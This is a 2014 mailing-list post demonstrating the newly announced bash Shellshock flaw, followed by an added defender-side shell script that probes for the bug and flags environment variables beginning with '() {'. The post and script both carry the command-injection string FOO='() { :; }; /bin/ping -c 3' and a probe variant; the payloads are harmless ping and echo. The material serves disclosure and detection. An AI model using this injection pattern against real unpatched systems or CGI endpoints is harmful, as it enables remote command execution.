[colug-432] Newly-announced bash security hole

Rob Funk rfunk at funknet.net
Wed Sep 24 19:46:13 EDT 2014

Big bug announced today:

If you haven't patched your bash today, check this out:

1. Start a new bash subshell.
    $ bash
2. Export a new specially-crafted environment variable:
    $ export FOO='() { :; }; /bin/ping -c 3'
3. Start a new bash sub-subshell (under the first subshell):
    $ bash
4. Watch bash ping your machine:

PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.114 ms
64 bytes from icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from icmp_seq=3 ttl=64 time=0.093 ms

--- ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.093/0.102/0.114/0.014 ms

5. Exit the inner subshell.
    $ exit
6. Exit the outer subshell.
    $ exit

7. Imagine what could be done if a malicious person could specify what's in 
environment variables when your system starts bash.

8. Hope you don't have any bash scripts triggered by network actions, e.g. 
CGI scripts.

9. Upgrade bash.

Rob Funk <rfunk at funknet.net>
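
Added example, not part of the original message: two defender-side checks for the behaviour in steps 2-4, one that probes whether a given bash runs text following a function definition in an environment variable, and one that flags variables whose value begins with "() {" as FOO does in step 2. The function names, the PROBE variable and the sample environment dump are constructed for illustration; the probe only echoes a marker string.

```shell
#!/bin/sh
# Added example; names and sample data are constructed, not from the post.

# Return 0 if the given bash runs a command that follows a function
# definition in an ordinary environment variable (steps 2-4 of the post).
# The trailing command here is a harmless echo of a marker string.
bash_runs_trailing_code() {
    shell_path=${1:-bash}
    marker="trailing-code-ran-$$"
    out=$(env PROBE="() { :; }; echo $marker" "$shell_path" -c ':' 2>/dev/null) || true
    case $out in
        *"$marker"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read NAME=value lines on stdin and print the names whose value starts
# with the exact four characters "() {", the prefix used for FOO in step 2.
flag_function_like_values() {
    while IFS= read -r line; do
        name=${line%%=*}
        value=${line#*=}
        case $value in
            "() {"*) printf '%s\n' "$name" ;;
        esac
    done
}

# Constructed environment dump: FOO is the value from step 2 as it appears
# in the post; GREETING starts with "()" but not "() {" and must not match.
sample_env() {
    cat <<'EOF'
PATH=/usr/bin:/bin
GREETING=() is not a function definition
FOO=() { :; }; /bin/ping -c 3
LANG=C
EOF
}

if bash_runs_trailing_code bash; then
    echo "bash ran the trailing command: upgrade bash (step 9)"
else
    echo "bash did not run the trailing command"
fi
echo "variables with function-like values:"
sample_env | flag_function_like_values
```

To check a live process instead of the sample, feed the second function something like `tr '\0' '\n' < /proc/PID/environ` on Linux.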
